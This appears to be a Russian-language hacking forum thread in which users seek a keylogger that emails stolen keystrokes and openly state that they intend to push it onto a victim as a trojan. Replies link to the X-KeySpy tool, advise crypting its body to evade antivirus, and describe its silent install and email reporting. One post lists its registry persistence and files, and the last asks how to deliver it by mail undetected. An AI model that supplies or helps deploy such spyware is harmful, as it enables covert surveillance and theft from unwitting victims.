![]() |
Кейлогер нужен
Дайте плиз линк на хорошего кейлогера, только мыльного, типа как в пинче и хинче, но только чтоб работал.
___________ Спасибо! |
|
Цитата:
|
X-KeySpy v0.7
_http://freeshells.ch/~hsi/xkeyspy.zip Очень приличный логгер. Имеет собственный smtp-сервер для отправки отчетов. P.S. После конфигурирования желательно закриптовать тело. |
http://www.actualspy.ru/
http://www.z-oleg.com/secur/articles/keylogger.php http://worldcpp.vingrad.ru/vspp/zgrt117.php http://content.mail.ru/pages/p_1684.html http://www.izcity.com/lib/28042005.htm гуглим товарищ |
Про актруал спай знаю, у самого стоит.., вы меня видимо не так поняли... мне нужно впарить кейлогер челу, как трояна, а потом просто словить лог на мыло или на хост, а эти вроде не по такому принцыпу работают..
Или я ошибаюсь, поправьте если че.. |
Benzin
Ну вот xkeyspy по такому принципу и работает. После запуска незаметно устанавливается в системе и шлет логи на указанный при конфигурации email. Размер сжатого тела - 5 Кб. |
Цитата:
|
Benzin
Вот это я не помню. Проще всего тебе будет запустить AVP и удалить им, так как эта версия некриптованная и ее сигнатура есть в базе. Либо запустить еще раз и отследить манипуляции с ФС и реестром с помощью Regshot, File Monitor |
Расковырял я его.
Логгер делает следующее: Пишет в реестр - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\svroot с параметром C:\WINDOWS\system32\svroot.exe Пишет в системную папку два файла: C:\WINDOWS\system32\svroot.dll C:\WINDOWS\system32\gorsys32.dll Чтобы избавиться от логгера достаточно удалить параметр из реестра и тело из системной папки. |
Цитата:
Блин никак не могу определиться какой размер на лог файл ставить.., ты сколько ставишь? |
Benzin
Я нисколько, потому что впариванием не увлекаюсь. (: Поставь 1-2 Кб, этого достаточно, я думаю. |
Цитата:
|
X-KeySpy y АVG - натуральным Трояном кличется.
Если нетрудно, опишите пожалуста новичку процесс впаривания этого (иль другого) кейлогера на комп через мыло. Как криптовать чтобы не подозрили, и т.д. У меня WINDOWS не русский, и конфигуратор X-KeySpy виден мне в вопросительных знаках. Помогите расшифровать эти 3 поля. |
| Время: 23:31 |